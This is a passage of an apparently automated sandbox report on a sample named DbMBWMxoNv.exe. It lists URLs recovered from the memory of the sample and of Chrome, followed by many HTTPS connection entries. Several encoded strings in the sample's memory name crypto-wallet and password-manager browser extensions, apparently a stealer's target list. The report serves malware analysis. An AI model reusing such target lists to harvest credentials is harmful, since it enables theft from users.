Source: chrome.exe, 00000004.00000003.1491053954.00001B44014A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000004.00000003.1465388538.00001B44010F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000004.00000002.1552929037.00001B44004CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000004.00000002.1630406237.00001B44009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000004.00000002.1636762700.00001B4401430000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491004628.00001B4401498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491053954.00001B44014A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/url?q=https://google.com/chrome/safety%3Fbrand%3DKFKH%26utm_source%3Dweb%26ut
Source: chrome.exe, 00000004.00000003.1477050519.00001B440033C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000004.00000002.1549162636.00001B440001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000004.00000003.1477050519.00001B440033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1635804540.00001B44010CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000004.00000003.1477050519.00001B440033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1635804540.00001B44010CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000004.00000002.1552929037.00001B44004CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000004.00000002.1636806922.00001B4401444000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000004.00000003.1490901559.00001B44013D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1492337895.00001B440140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491401296.00001B4401024000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1492058737.00001B44013D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1493492115.00001B44014D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491924067.00001B440143C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1636806922.00001B4401444000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000004.00000002.1636762700.00001B4401430000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491004628.00001B4401498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491053954.00001B44014A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.mTUNAFoITms.2019.O/rt=j/m=q_d
Source: chrome.exe, 00000004.00000002.1636762700.00001B4401430000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491004628.00001B4401498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491053954.00001B44014A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.GZmhE2vV14w.L.W.O/m=qmd
Source: DbMBWMxoNv.exe, 00000000.00000002.1925344849.0000000023310000.00000004.00000020.00020000.00000000.sdmp, DGCGDBGCAAEBFIECGHDG.0.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: DbMBWMxoNv.exe, 00000000.00000003.1807489117.0000000023913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: DbMBWMxoNv.exe, 00000000.00000003.1807489117.0000000023913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/esolution:
Source: DbMBWMxoNv.exe, 00000000.00000003.1807489117.0000000023913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: DbMBWMxoNv.exe, 00000000.00000003.1807489117.0000000023913000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: DbMBWMxoNv.exe, 00000000.00000003.1807489117.0000000023913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1551434034.00001B44002C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
